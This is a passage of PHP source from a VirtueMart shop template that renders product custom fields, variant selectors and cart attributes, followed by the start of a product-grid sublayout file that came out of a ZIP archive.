					$avail = $productModel->getProductChildIds($customfield->virtuemart_product_id, $extra);
					if(!in_array($customfield->virtuemart_product_id,$avail)){
						array_unshift($avail,$customfield->virtuemart_product_id);
					}

					foreach($customfield->options as $product_id=>$variants){
						static $counter = 0;
						if(!in_array($product_id,$avail)){
							vmdebug('$customfield->options Product to ignore, continue ',$product_id);
							continue;
						}

						foreach($variants as $k => $variant){

							if(!isset($dropdowns[$k]) or !is_array($dropdowns[$k])) $dropdowns[$k] = array();
							if(!in_array($variant,$dropdowns[$k])  ){

								if($k==0 or !$productSelection){
									$dropdowns[$k][] = $variant;
								} else{
									if($productSelection[$k-1] == $variants[$k-1]) {
										$break = false;
										for( $h = 1; $h<=$k; $h++ ) {
											if($productSelection[$h - 1] != $variants[$h - 1]) {
												$break = true;
											}
										}
										if(!$break) {
											$dropdowns[$k][] = $variant;
										}
									}
								}
							}
						}
					}

					$class = 'vm-chzn-select';
					$selectType = 'select.genericlist';

					if(!empty($customfield->selectType)){
						$selectType = 'select.radiolist';
						$class = '';
						$dom = '';
						//$idTagK = VmHtml::ensureUniqueId($idTag.'cvard'.$k);
					} else {
						vmJsApi::chosenDropDowns();
						$dom = 'select';
						//$idTagK = '[';	//Joomla workaround to get a list without id
					}

					//$attribs = array('class'=>$class.' cvselection no-vm-bind','style'=>'min-width:70px;');
					// Flex 3.8.1 fix for Radios
					$attribs = array('class'=>$class.' cvselection no-vm-bind form-radio','style'=>'min-width:auto;');

					$view = 'productdetails';
					$attribs['data-reload'] = '1';
					if(VmConfig::get ('jdynupdate', TRUE)){
						$view = vRequest::getCmd('view','productdetails');
						if($view == 'productdetails' or ($customfield->browseajax and $view == 'category')){
							$attribs['data-dynamic-update'] = '1';
							unset($attribs['data-reload']);
						} else {
							$view = 'productdetails';
						}
					}

					foreach($customfield->selectoptions as $k => $soption){
						$html .= '<div class="custom_field_C_container">';
						$options = array();
						$selected = false;
						$idTagK = VmHtml::ensureUniqueId($idTag);

						if(isset($dropdowns[$k])){
							foreach($dropdowns[$k] as $i=> $elem){

								$elem = trim((string)$elem);
								$text = $elem;
								
								// Flex 3.9 fix for Radios
								if(isset($customfield->selectType)){
									if(empty($customfield->selectType)){
										// If custom field is "Select"
										$text = vmText::_($elem);
									} else {
										// If custom field is "Radio"
										$text = '<span class="checker">'. vmText::_($elem) .'</span>';
									}
								}

								if($soption->clabel!='' and in_array($soption->voption,VirtueMartModelCustomfields::$dimensions) ){
									$rd = $soption->clabel;
									if(is_numeric($rd) and is_numeric($elem)){
										$text = number_format(round((float)$elem,(int)$rd),$rd);
									} 
								} 
								//else if  ($soption->voption === 'clabels' and $soption->clabel!='') {
									// Disabled in Flex 3.8.1
									// $text = vmText::_($elem);
								//}

								if(empty($elem)){
									if(empty($customfield->selectType)){
										// If custom field is "Select"
										$text = vmText::_('COM_VIRTUEMART_LIST_EMPTY_OPTION');
									} else {
										// If custom field is "Radio"
										$text = '<span class="checker-select">'. vmText::_('COM_VIRTUEMART_LIST_EMPTY_OPTION') .'</span>';
									}
								}
								$o = new stdClass();
								$o->value = $elem;
								$o->text = $text;
								$options[] = $o;

								if($productSelection and $productSelection[$k] == $elem){
									$selected = $elem;
								} 
							}
						}

						if(empty($selected)){
							$product->orderable=false;
						}

						if($customfield->showlabels){
							if( in_array($soption->voption,VirtueMartModelCustomfields::$dimensions) ){
								$soption->slabel = vmText::_('COM_VIRTUEMART_'.strtoupper($soption->voption));
							} else if(!empty($soption->clabel) and !in_array($soption->voption,VirtueMartModelCustomfields::$dimensions) ){
								$soption->slabel = vmText::_($soption->clabel);
							}
							if(isset($soption->slabel)){
								$html .= '<span class="vm-cmv-label" >'.$soption->slabel.'</span>';
							}

						}

						$attribs['data-cvsel'] = 'field' . $customfield->virtuemart_customfield_id ;
						$fname = $fieldname.'['.$k.']';

						//$html .= JHtml::_ ($selectType, $options, $fname, $attribs , "value", "text", $selected,$idTagK);
						$html .= JHtml::_ ($selectType, $options, $fname, $attribs , "value", "text", $selected, $idTagK);
						$html .= '</div>';
					}

					$Itemid = vRequest::getInt('Itemid',''); // '&Itemid=127';
					if(!empty($Itemid)){
						$Itemid = '&Itemid='.$Itemid;
					}

					//create array for js
					$jsArray = array();

					$url = '';

					foreach($customfield->options as $product_id=>$variants){

						if(!in_array($product_id,$avail)){continue;}

						$url = JRoute::_('index.php?option=com_virtuemart&view='.$view.'&virtuemart_category_id=' . $virtuemart_category_id . '&virtuemart_product_id='.$product_id.$Itemid,false);
						$jsArray[] = '["'.$url.'","'.implode('","',$variants).'"]';
					}

					vmJsApi::addJScript('cvfind');

					$BrowserNewState =  '';
					if($view != 'productdetails'){
						$BrowserNewState = 'Virtuemart.setBrowserState = false;';
					}

					$jsVariants = implode(',',$jsArray);

					$selector = $dom."[data-cvsel=\"".$attribs['data-cvsel']."\"]";
					$hash = md5($selector);
					$j = "jQuery(document).ready(function($) {
							".$BrowserNewState."
							$('".$selector."').off('change',Virtuemart.cvFind);
							$('".$selector."').on('change', { variants:[".$jsVariants."] },Virtuemart.cvFind);
						});";
					vmJsApi::addJScript('cvselvars'.$hash,$j,true,false,false,$hash);

					//Now we need just the JS to reload the correct product
					$customfield->display = $html;

					break;

				case 'A':

					$html = '';

					$productModel = VmModel::getModel ('product');

					//Note by Jeremy Magne (Daycounts) 2013-08-31
					//Previously the the product model is loaded but we need to ensure the correct product id is set because the getUncategorizedChildren does not get the product id as parameter.
					//In case the product model was previously loaded, by a related product for example, this would generate wrong uncategorized children list
					$productModel->setId($customfield->virtuemart_product_id);

					$uncatChildren = $productModel->getUncategorizedChildren ($customfield->withParent);

					$options = array();

					$selected = vRequest::getInt ('virtuemart_product_id',0);
					$selectedFound = false;

					$view = 'productdetails';
					$attribs['data-reload'] = '1';
					if(VmConfig::get ('jdynupdate', TRUE)){
						$view = vRequest::getCmd('view','productdetails');
						if($view == 'productdetails' or ($customfield->browseajax and $view == 'category')){
							$attribs['data-dynamic-update'] = '1';
							unset($attribs['data-reload']);
						} else {
							$view = 'productdetails';
						}
					}

					$Itemid = vRequest::getInt('Itemid',''); // '&Itemid=127';
					if(!empty($Itemid)){
						$Itemid = '&Itemid='.$Itemid;
					}

					if(!$customfield->withParent){
						$options[0] = $emptyOption;
						$options[0]->value = JRoute::_ ('index.php?option=com_virtuemart&view='.$view.'&virtuemart_category_id=' . $virtuemart_category_id . '&virtuemart_product_id=' . $customfield->virtuemart_product_id,FALSE);
						//$options[0] = array('value' => JRoute::_ ('index.php?option=com_virtuemart&view=productdetails&virtuemart_category_id=' . $virtuemart_category_id . '&virtuemart_product_id=' . $customfield->virtuemart_product_id,FALSE), 'text' => vmText::_ ('COM_VIRTUEMART_ADDTOCART_CHOOSE_VARIANT'));
					}

					$parentStock = 0;
					if($uncatChildren){
						foreach ($uncatChildren as $k => $child) {
							/*if(!isset($child[$customfield->customfield_value])){
								vmdebug('The child has no value at index '.$customfield->customfield_value,$customfield,$child);
							} else {*/

							$productChild = $productModel->getProduct((int)$child,true);

							if(!$productChild) continue;
							if(!isset($productChild->{$customfield->customfield_value})){
								vmdebug('The child has no value at index '.$child);
								continue;
							}
							$available = $productChild->product_in_stock - $productChild->product_ordered;
							if(VmConfig::get('stockhandle','none')=='disableit_children' and $available <= 0){
								continue;
							}
							$parentStock += $available;
							$priceStr = '';
							if($customfield->wPrice){
								//$product = $productModel->getProductSingle((int)$child['virtuemart_product_id'],false);
								$productPrices = $calculator->getProductPrices ($productChild);
								$priceStr =  ' (' . $currency->priceDisplay ($productPrices['salesPrice']) . ')';
							}
							$options[] = array('value' => JRoute::_ ('index.php?option=com_virtuemart&view='.$view.'&virtuemart_category_id=' . $virtuemart_category_id . '&virtuemart_product_id=' . $productChild->virtuemart_product_id,false), 'text' => $productChild->{$customfield->customfield_value}.$priceStr);

							if($selected==$child){
								$selectedFound = true;
								vmdebug($customfield->virtuemart_product_id.' $selectedFound by vRequest '.$selected);
							}
							//vmdebug('$child productId ',$child['virtuemart_product_id'],$customfield->customfield_value,$child);
							//}
						}
					}

					if(!$selectedFound){
						$pos = array_search($customfield->virtuemart_product_id, $product->allIds);
						if(isset($product->allIds[$pos-1])){
							$selected = $product->allIds[$pos-1];
							//vmdebug($customfield->virtuemart_product_id.' Set selected to - 1 allIds['.($pos-1).'] = '.$selected.' and count '.$dynChilds);
							//break;
						} elseif(isset($product->allIds[$pos])){
							$selected = $product->allIds[$pos];
							//vmdebug($customfield->virtuemart_product_id.' Set selected to allIds['.$pos.'] = '.$selected.' and count '.$dynChilds);
						} else {
							$selected = $customfield->virtuemart_product_id;
							//vmdebug($customfield->virtuemart_product_id.' Set selected to $customfield->virtuemart_product_id ',$selected,$product->allIds);
						}
					}

					$url = 'index.php?option=com_virtuemart&view='.$view.'&virtuemart_category_id='.
					$virtuemart_category_id .'&virtuemart_product_id='. $selected;
					$attribs['option.key.toHtml'] = false;
					$attribs['id'] = '[';//$idTag;


					$och = '';
					if(!empty($attribs['data-reload'])){
						$och = ' onchange="window.top.location.href=this.options[this.selectedIndex].value" data-reload=1';
						unset($attribs['data-reload']);
					} else {
						$och = ' data-dynamic-update="1"';
						unset($attribs['data-dynamic-update']);
					}

					$attribs['list.attr'] = 'size="1" class="vm-chzn-select no-vm-bind avselection"'.$och;
					$attribs['list.translate'] = false;
					$attribs['option.key'] = 'value';
					$attribs['option.text'] = 'text';
					$attribs['list.select'] = JRoute::_ ($url,false);


					$html .= JHtml::_ ('select.genericlist', $options, $fieldname, $attribs);

					vmJsApi::chosenDropDowns();

					if($customfield->parentOrderable==0){
						if($product->virtuemart_product_id==$customfield->virtuemart_product_id){
							$product->orderable = false;
							$product->product_in_stock = $parentStock;
						}
					}

					$dynChilds++;
					$customfield->display = $html;

					vmJsApi::addJScript('cvfind');

					$BrowserNewState =  '';
					if($view != 'productdetails'){
						$BrowserNewState = 'Virtuemart.setBrowserState = false;';
					}

					if($customfield->browseajax){
						$j = "jQuery(document).ready(function($) {
							".$BrowserNewState."
							$('select.avselection').off('change',Virtuemart.avFind);
							$('select.avselection').on('change',{},Virtuemart.avFind);
						});";
						vmJsApi::addJScript('avselvars',$j,true);
					}
					break;

				/*Date variant*/
				case 'D':
					if(empty($customfield->custom_value)) $customfield->custom_value = 'LC2';
					//Customer selects date
					if($customfield->is_input){
						$date = '';
						if(!empty($customfield->customfield_value)){
							try{
								$date = new DateTime();
								$date->add(new DateInterval($customfield->customfield_value));
								$date = $date->format('Y-m-d');
							} catch (Exception $e){
								$date = $customfield->customfield_value;
							}
						}
						$yearRange = '';
						if(!empty($customfield->yearRangeStart)){
							$d = new DateTime();
							$d->add(new DateInterval('P'.$customfield->yearRangeStart.'Y'));
							$d = $d->format('Y');
							$yearRange = $d;
						} else {
							$yearRange = date('Y');
						}

						if(!empty($customfield->yearRangePeriod)){
							$d = new DateTime();
							$d->add(new DateInterval('P'.$customfield->yearRangePeriod.'Y'));
							$d = $d->format('Y');
							$yearRange .= ':'.$d;
						} else {
							$yearRange .= ':1';
						}

						//$yearRange = '2018:2020';
						$customfield->display =  '<span class="product_custom_date">' . vmJsApi::jDate ($date,$customProductDataName.'[' . $customfield->virtuemart_customfield_id . ']', NULL, TRUE, $yearRange) . '</span>'; //vmJsApi::jDate($field->custom_value, 'field['.$row.'][custom_value]','field_'.$row.'_customvalue').$priceInput;
					}
					//Customer just sees a date
					else {
						$customfield->display =  '<span class="product_custom_date">' . vmJsApi::date ($customfield->customfield_value, $customfield->custom_value, TRUE) . '</span>';
					}

					break;
				/* text area or editor No vmText, only displayed in BE */
				case 'X':
				case 'Y':
					$customfield->display =  $customfield->customfield_value;

					break;
				/* string or integer */
				case 'B':
				case 'S':
				case 'M':
					if(VmConfig::get('hideEmptyCustomfields',false) and empty($customfield->customfield_value)) break;
					//vmdebug('Example for params ',$customfield);
					if(isset($customfield->selectType)){
						if(empty($customfield->selectType)){
							$selectType = 'select.genericlist';
							if(!empty($customfield->is_input)){
								vmJsApi::chosenDropDowns();
								$class = 'class="vm-chzn-select"';
								//$class = 'class="vm-chzn-select" style="min-width:auto;"';
								$idTag = '[';
							}
						} else {
							$selectType = 'select.radiolist';
							//$class = '';
							$class = 'class="form-radio" style="min-width:auto;"';
						}
					} else {
						if($type== 'M'){
							$selectType = 'select.radiolist';
							$class = '';
						} else {
							$selectType = 'select.genericlist';
							if(!empty($customfield->is_input)){
								vmJsApi::chosenDropDowns();
								$class = 'class="vm-chzn-select"';
								$idTag = '[';
							}
						}
					}

					if($customfield->is_list and $customfield->is_list!=2){

						if(!empty($customfield->is_input)){

							$options = array();

							if($customfield->addEmpty){
								$options[0] = $emptyOption;
							}

							$values = explode (';', $customfield->custom_value);

							foreach ($values as $val) {

								//if($val == 0 and $customfield->addEmpty){
									//continue;
								//}
								if($type == 'M'){
									$tmp = array('value' => $val, 'text' => VirtueMartModelCustomfields::displayCustomMedia ($val,'product',$customfield->width,$customfield->height));
								} else {
									$tmp = array('value' => $val, 'text' => vmText::_($val));
								}
								$options[] = (object)$tmp;
							}
							$currentValue = $customfield->customfield_value;

							$customfield->display = JHtml::_ ($selectType, $options, $customProductDataName.'[' . $customfield->virtuemart_customfield_id . ']', $class, 'value', 'text', $currentValue,$idTag);
						} else {
							if($type == 'M'){
								$customfield->display =  VirtueMartModelCustomfields::displayCustomMedia ($customfield->customfield_value,'product',$customfield->width,$customfield->height);
							} else {
								$customfield->display =  vmText::_ ($customfield->customfield_value);
							}
						}
					} else {

						if(!empty($customfield->is_input)){

							if(!isset($selectList[$customfield->virtuemart_custom_id])) {
								$selectList[$customfield->virtuemart_custom_id] = $key;
								if($customfield->addEmpty){
									if(empty($customfields[$selectList[$customfield->virtuemart_custom_id]]->options)){
										$customfields[$selectList[$customfield->virtuemart_custom_id]]->options[0] = $emptyOption;
										$customfields[$selectList[$customfield->virtuemart_custom_id]]->options[0]->virtuemart_customfield_id = $emptyOption->value;
										//$customfields[$selectList[$customfield->virtuemart_custom_id]]->options['nix'] = array('virtuemart_customfield_id' => 'none', 'text' => vmText::_ ('COM_VIRTUEMART_ADDTOCART_CHOOSE_VARIANT'));
									}
								}

								$tmpField = clone($customfield);
								$tmpField->options = null;
								$customfield->options[$customfield->virtuemart_customfield_id] = $tmpField;

								$customfield->customProductDataName = $customProductDataName;

							} else {
								$customfields[$selectList[$customfield->virtuemart_custom_id]]->options[$customfield->virtuemart_customfield_id] = $customfield;
								unset($customfields[$key]);

							}

							$default = reset($customfields[$selectList[$customfield->virtuemart_custom_id]]->options);
							foreach ($customfields[$selectList[$customfield->virtuemart_custom_id]]->options as $k => $productCustom) {
								if(!isset($productCustom->customfield_price)) $productCustom->customfield_price = 0.0;
								if(!isset($productCustom->customfield_value)) $productCustom->customfield_value = '';
								$price = VirtueMartModelCustomfields::renderCustomfieldPrice($productCustom, $product, $calculator);
								if($type == 'M'){
									$productCustom->text = VirtueMartModelCustomfields::displayCustomMedia ($productCustom->customfield_value,'product',$customfield->width,$customfield->height).' '.$price;
								} else {
									// $type == 'S' (string) custom field
									$trValue = '';
									// Flex 3.9 fix for Radios
									if(isset($customfield->selectType)){
										if(empty($customfield->selectType)){
											// If custom field is "Select"
											$trValue .= '';
										} else {
											// If custom field is "Radio"
											$trValue .= '<span class="checker">';
										}
									} 
									$trValue .= vmText::_($productCustom->customfield_value);
									if($productCustom->customfield_value!=$trValue and strpos($trValue,'%1')!==false){
										$productCustom->text = vmText::sprintf($productCustom->customfield_value,$price);
									} else {
										$productCustom->text = $trValue.' '.$price;
									}
									// Flex 3.9 fix for Radios
									if(isset($customfield->selectType)){
										if(empty($customfield->selectType)){
											// If custom field is "Select"
											$trValue .= '';
										} else {
											// If custom field is "Radio"
											$trValue .= '</span>';
										}
									} 
								}
								$customfields[$selectList[$customfield->virtuemart_custom_id]]->options[$k] = $productCustom;
							}


							$customfields[$selectList[$customfield->virtuemart_custom_id]]->display = JHtml::_ ($selectType, $customfields[$selectList[$customfield->virtuemart_custom_id]]->options,
							$customfields[$selectList[$customfield->virtuemart_custom_id]]->customProductDataName,
							$class, 'virtuemart_customfield_id', 'text', $default->customfield_value,$idTag);	//*/
						} else {
							if($type == 'M'){
								$customfield->display = VirtueMartModelCustomfields::displayCustomMedia ($customfield->customfield_value,'product',$customfield->width,$customfield->height);
							} else {
								$customfield->display = vmText::_ ($customfield->customfield_value);
							}
						}
					}

					break;

				// Property
				case 'P':
					//$customfield->display = vmText::_ ('COM_VIRTUEMART_'.strtoupper($customfield->customfield_value));
					$attr = $customfield->customfield_value;
					$lkey = 'COM_VIRTUEMART_'.strtoupper($customfield->customfield_value).'_FE';
					$trValue = vmText::_ ($lkey);
					$options[] = array('value' => 'product_length', 'text' => vmText::_ ('COM_VIRTUEMART_PRODUCT_LENGTH'));
					$options[] = array('value' => 'product_width', 'text' => vmText::_ ('COM_VIRTUEMART_PRODUCT_WIDTH'));
					$options[] = array('value' => 'product_height', 'text' => vmText::_ ('COM_VIRTUEMART_PRODUCT_HEIGHT'));
					$options[] = array('value' => 'product_weight', 'text' => vmText::_ ('COM_VIRTUEMART_PRODUCT_WEIGHT'));

					$dim = '';

					if($attr == 'product_length' or $attr == 'product_width' or $attr == 'product_height'){
						$dim = $product->product_lwh_uom;
					} else if($attr == 'product_weight') {
						$dim = $product->product_weight_uom;
					}
					if(!isset($product->{$attr})){
						logInfo('customfield.php: case P, property '.$attr.' does not exists. virtuemart_custom_id: '.$customfield->virtuemart_custom_id);
						break;
					}
					$val = $product->{$attr};
					if($customfield->round!=0){
						if(empty($customfield->digits)) $customfield->digits = 0;
						$val = $currency->getFormattedNumber($val,$customfield->digits);
					}
					if($lkey!=$trValue and strpos($trValue,'%1')!==false) {
						$customfield->display = vmText::sprintf( $customfield->customfield_value, $val , $dim );
					} else if($lkey!=$trValue) {
						$customfield->display = $trValue.' '.$val;
					} else {
						$customfield->display = vmText::_ ('COM_VIRTUEMART_'.strtoupper($customfield->customfield_value)).' '.$val.$dim;
					}

					break;
				case 'Z':
					if(empty($customfield->customfield_value)) break;
					$html = '';
					$q = 'SELECT * FROM `#__virtuemart_categories_' . VmConfig::$vmlang . '` as l INNER JOIN `#__virtuemart_categories` AS c ON (l.`virtuemart_category_id`=c.`virtuemart_category_id`) WHERE `published`=1 AND l.`virtuemart_category_id`= "' . (int)$customfield->customfield_value . '" ';
					$db = JFactory::getDBO();
					$db->setQuery ($q);
					if ($category = $db->loadObject ()) {

						if(empty($category->virtuemart_category_id)) break;

						$q = 'SELECT `virtuemart_media_id` FROM `#__virtuemart_category_medias`WHERE `virtuemart_category_id`= "' . $category->virtuemart_category_id . '" ';
						$db->setQuery ($q);
						$thumb = '';
						if ($media_id = $db->loadResult ()) {
							$thumb = VirtueMartModelCustomfields::displayCustomMedia ($media_id,'category',$customfield->width,$customfield->height);
						}
						$customfield->display = JHtml::link (JRoute::_ ('index.php?option=com_virtuemart&view=category&virtuemart_category_id=' . $category->virtuemart_category_id), $thumb . ' ' . $category->category_name, array('title' => $category->category_name,'target'=>'_blank'));
					}

					break;
				case 'R':
					$customfield->customfield_value = (int) $customfield->customfield_value;
					if(empty($customfield->customfield_value)){
						$customfield->display = 'customfield related product has no value';
						break;
					}

					$pModel = VmModel::getModel('product');
					$related = $pModel->getProduct((int)$customfield->customfield_value,TRUE,$customfield->wPrice,TRUE,1);

					if(!$related) break;

					$thumb = '';
					if($customfield->wImage) {
						if(!empty( $related->virtuemart_media_id[0] )) {
							$thumb = VirtueMartModelCustomfields::displayCustomMedia( $related->virtuemart_media_id[0], 'product', $customfield->width, $customfield->height ).' ';
						} else {
							$thumb = VirtueMartModelCustomfields::displayCustomMedia( 0, 'product', $customfield->width, $customfield->height ).' ';
						}
					}

					if($customfield->waddtocart){
						if (!empty($related->customfields)) {

							$customfieldsModel = VmModel::getModel ('customfields');
							if(empty($customfield->from)) {
								$customfield->from = $related->virtuemart_product_id;
								$customfieldsModel -> displayProductCustomfieldFE ($related, $related->customfields);
							} else if($customfield->from!=$related->virtuemart_product_id){
								$customfieldsModel -> displayProductCustomfieldFE ($related, $related->customfields);
							}

						}
						$isCustomVariant = false;
						if (!empty($related->customfields)) {
							foreach ($related->customfields as $k => $custom) {
								if($custom->field_type == 'C' and $custom->virtuemart_product_id != (int)$customfield->customfield_value){
									$isCustomVariant = $custom;
								}
								if (!empty($custom->layout_pos)) {
									$related->customfieldsSorted[$custom->layout_pos][] = $custom;
								} else {
									$related->customfieldsSorted['normal'][] = $custom;
								}
								unset($related->customfields);
							}

						}
					}
					$customfield->display = shopFunctionsF::renderVmSubLayout('related',array('customfield'=>$customfield,'related'=>$related, 'thumb'=>$thumb));

					break;
			}

			$viewData['customfields'][$key] = $customfield;
			//vmdebug('my customfields '.$type,$viewData['customfields'][$k]->display);
		}

	}

	static function renderCustomfieldsCart($product, $html, $trigger){
		if(isset($product->param)){
			vmTrace('param found, seek and destroy');
			return false;
		}
		$row = 0;

		$variantmods = isset($product -> customProductData)?$product -> customProductData:$product -> product_attribute;

		if(!is_array($variantmods)){
			$variantmods = json_decode($variantmods,true);
		}

		//We let that here as Fallback
		if(empty($product->customfields)){

			$productDB = VmModel::getModel('product')->getProduct($product->virtuemart_product_id);
			if($productDB and !empty($productDB->customfields)){

				$product->customfields = $productDB->customfields;
			} else {
				$product->customfields = array();
			}
		}
		//vmdebug('renderCustomfieldsCart $variantmods',$variantmods);
		$productCustoms = array();
		foreach( (array)$product->customfields as $prodcustom){

			//We just add the customfields to be shown in the cart to the variantmods
			if(is_object($prodcustom)){

				//We need this here to ensure that broken customdata of order items is shown updated info, or at least displayed,
				if($prodcustom->is_cart_attribute or $prodcustom->is_input){

					//The problem here is that a normal value and an array can be valid. The function should complement, or update the product. So we are not allowed
					//to override existing values. When the $variantmods array is not set for the key, then we add an array, when the customproto is used more than one time
					if(!isset($variantmods[$prodcustom->virtuemart_custom_id])){
						$variantmods[$prodcustom->virtuemart_custom_id][$prodcustom->virtuemart_customfield_id] = $prodcustom->virtuemart_customfield_id;
					}
					//the missing values are added with an own key.
					if( is_array($variantmods[$prodcustom->virtuemart_custom_id]) and
						!isset($variantmods[$prodcustom->virtuemart_custom_id][$prodcustom->virtuemart_customfield_id]) ){

						$variantmods[$prodcustom->virtuemart_custom_id][$prodcustom->virtuemart_customfield_id] = $prodcustom->virtuemart_customfield_id;
					}
				}

				$productCustoms[$prodcustom->virtuemart_customfield_id] = $prodcustom;
			}
		}

		foreach ( (array)$variantmods as $i => $customfield_ids) {

			if(!is_array($customfield_ids)){
				$customfield_ids = array( $customfield_ids =>false);
			}

			foreach($customfield_ids as $customfield_id=>$params){

				if(empty($productCustoms) or !isset($productCustoms[$customfield_id])){
					//vmdebug('displayProductCustomfieldSelected continue',$customfield_id,$productCustoms);
					continue;
				}
				$productCustom = $productCustoms[$customfield_id];
				//vmdebug('displayProductCustomfieldSelected ',$customfield_id,$productCustom);
				//The stored result in vm2.0.14 looks like this {"48":{"textinput":{"comment":"test"}}}
				//and now {"32":[{"invala":"100"}]}
				if (!empty($productCustom)) {
					$otag = ' <span class="product-field-type-' . $productCustom->field_type . '">';
					$tmp = '';
					if ($productCustom->field_type == "E") {

						VmConfig::importVMPlugins ('vmcustom');
						$dispatcher = JDispatcher::getInstance ();
						$dispatcher->trigger ($trigger.'VM3', array(&$product, &$productCustom, &$tmp));
					}
					else {
						$value = '';

						if (($productCustom->field_type == 'G')) {
							$db = JFactory::getDBO ();
							$db->setQuery ('SELECT  `product_name` FROM `#__virtuemart_products_' . VmConfig::$vmlang . '` WHERE virtuemart_product_id=' . (int)$productCustom->customfield_value);
							$child = $db->loadObject ();
							$value = $child->product_name;
						}
						elseif (($productCustom->field_type == 'M')) {
							$customFieldModel = VmModel::getModel('customfields');
							$value = $customFieldModel->displayCustomMedia ($productCustom->customfield_value,'product',$productCustom->width,$productCustom->height,VirtueMartModelCustomfields::$useAbsUrls);
						}
						elseif (($productCustom->field_type == 'S')) {

							if($productCustom->is_list and $productCustom->is_input){
								if($productCustom->is_list==2){
									$value = vmText::_($productCustom->customfield_value);
								} else {
									$value = vmText::_($params);
								}

							} else {
								$value = vmText::_($productCustom->customfield_value);
							}
						}
						elseif (($productCustom->field_type == 'A')) {
							if(!property_exists($product,$productCustom->customfield_value)){
								$productDB = VmModel::getModel('product')->getProduct($product->virtuemart_product_id);
								if($productDB){
									$attr = $productCustom->customfield_value;
									$product->{$attr} = $productDB->{$attr};
								}
							}
							$value = vmText::_( $product->{$productCustom->customfield_value} );
						}
						elseif (($productCustom->field_type == 'C')) {

							foreach($productCustom->options->{$product->virtuemart_product_id} as $k=>$option){
								$value .= '<span> ';
								if(!empty($productCustom->selectoptions[$k]->clabel) and in_array($productCustom->selectoptions[$k]->voption,VirtueMartModelCustomfields::$dimensions)){
									$value .= vmText::_('COM_VIRTUEMART_'.$productCustom->selectoptions[$k]->voption);
									$rd = $productCustom->selectoptions[$k]->clabel;
									if(is_numeric($rd) and is_numeric($option)){
										$value .= ' '.number_format(round((float)$option,(int)$rd),$rd);
									}
								} else {
									if(!empty($productCustom->selectoptions[$k]->clabel)) $value .= vmText::_($productCustom->selectoptions[$k]->clabel);
									$value .= ' '.vmText::_($option).' ';
								}
								$value .= '</span><br>';
							}
							$value = trim($value);
							if(!empty($value)){
								$html .= $otag.$value.'</span><br />';
							}

							continue;
						}
						elseif (($productCustom->field_type == 'D')) {
							//vmdebug('my date product customfield',$productCustom);
							if($productCustom->is_input){
								$value = $params;
							} else {
								$value = $productCustom->customfield_value;
							}

						}
						else {
							$value = vmText::_($productCustom->customfield_value);
						}
						$trTitle = vmText::_($productCustom->custom_title);
						$tmp = '';

						if($productCustom->custom_title!=$trTitle and strpos($trTitle,'%1')!==false){
							$tmp .= vmText::sprintf($productCustom->custom_title,$value);
						} else {
							$tmp .= $trTitle.' '.$value;
						}
					}
					if(!empty($tmp)){
						$html .= $otag.$tmp.'</span><br />';
					}


				}
				else {
					foreach ((array)$customfield_id as $key => $value) {
						$html .= '<br/ >Couldnt find customfield' . ($key ? '<span>' . $key . ' </span>' : '') . $value;
					}
					vmdebug ('customFieldDisplay, $productCustom is EMPTY '.$customfield_id);
				}
			}

		}

		return $html . '</div>';
	}
}

PK!6S�g660flex/html/com_virtuemart/sublayouts/products.phpnu&1i�<?php
/**
 * sublayout products
 *
 * @package	VirtueMart
 * @author Max Milbers
 * @link http://www.virtuemart.net
 * @copyright Copyright (c) 2014 VirtueMart Team. All rights reserved.
 * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL2, see LICENSE.php
 * @version $Id: cart.php 7682 2014-02-26 17:07:20Z Milbo $
 */

defined('_JEXEC') or die('Restricted access');
$products_per_row = empty($viewData['products_per_row'])? 1:$viewData['products_per_row'];
$currency = $viewData['currency'];
$showRating = $viewData['showRating'];
$verticalseparator = " vertical-separator";
echo shopFunctionsF::renderVmSubLayout('askrecomjs');

$ItemidStr = '';
$Itemid = shopFunctionsF::getLastVisitedItemId();
if(!empty($Itemid)){
	$ItemidStr = '&Itemid='.$Itemid;
}

$dynamic = false;
if (vRequest::getInt('dynamic',false)) {
	$dynamic = true;
}

foreach ($viewData['products'] as $type => $products ) {

	$col = 1;
	$nb = 1;
	$row = 1;

	if($dynamic){
		$rowsHeight[$row]['product_s_desc'] = 1;
		$rowsHeight[$row]['price'] = 1;
		$rowsHeight[$row]['customfields'] = 1;
		$col = 2;
		$nb = 2;
	} else {
	$rowsHeight = shopFunctionsF::calculateProductRowsHeights($products,$currency,$products_per_row);

		if( (!empty($type) and count($products)>0) or (count($viewData['products'])>1 and count($products)>0)){
			$productTitle = vmText::_('COM_VIRTUEMART_'.strtoupper($type).'_PRODUCT'); ?>
	<div class="<?php echo $type ?>-view">
	  <h4><?php echo $productTitle ?></h4>
			<?php // Start the Output
		}
	}

	// Calculating Products Per Row
	$cellwidth = ' width'.floor ( 100 / $products_per_row );

	$BrowseTotalProducts = count($products);

foreach ( $products as $product ) {
		if(!is_object($product) or empty($product->link)) {
			vmdebug('$product is not object or link empty',$product);
			continue;
		}
		// Show the horizontal seperator
		if ($col == 1 && $nb > $products_per_row) { ?>
	<div class="horizontal-separator"></div>
		<?php }

		// this is an indicator wether a row needs to be opened or not
		if ($col == 1) { ?>
	<div class="row productwrap">
		<?php }

		// Show the vertical seperator
		if ($nb == $products_per_row or $nb % $products_per_row == 0) {
			$show_vertical_separator = ' ';
		} else {
			$show_vertical_separator = $verticalseparator;
		}

    // Show Products ?>
	<div class="products col-sm-6 col-md-<?php echo round(12/$products_per_row) . $show_vertical_separator ?>">
		<div class="spacer product-container">
			<div class="spacer-img">
				<a title="<?php echo $product->product_name ?>" href="<?php echo $product->link.$ItemidStr; ?>">
					<?php
                    echo $product->images[0]->displayMediaThumb('class="browseProductImage"', false);
                    ?>
                    
                </a>
                
			</div> <!--spacer-img-->
			<div class="spacer-inner">
				<div class="vm-product-rating-container centered">
					<?php if (VmConfig::get('display_stock', 1)) { ?>
                        <?php if ($product->product_in_stock > 0) { ?>
                            <div class="product-in-stock">
                            <span data-toggle="tooltip" title="<?php echo $product->stock->stock_tip ?>">
                                <i class="pe pe-7s-check"></i>
                                <span class="stock"><?php echo JText::_('VM_IN_STOCK'); ?>
                                <?php echo $product->product_in_stock; ?></span>
                                </span>
                            </div>
                        <?php } else { ?>
                            <div class="product-in-stock">
                            <span data-toggle="tooltip" title="<?php echo $product->stock->stock_tip ?>">
                                <i class="pe pe-7s-less"></i>
                                <span class="stock"><?php echo JText::_('VM_OUT_OF_STOCK'); ?></span>
                                </span>
                            </div>
                        <?php } ?>
                    <?php } ?>
                    <?php // echo shopFunctionsF::renderVmSubLayout('rating',array('showRating'=>$showRating, 'product'=>$product)); ?>
                </div>
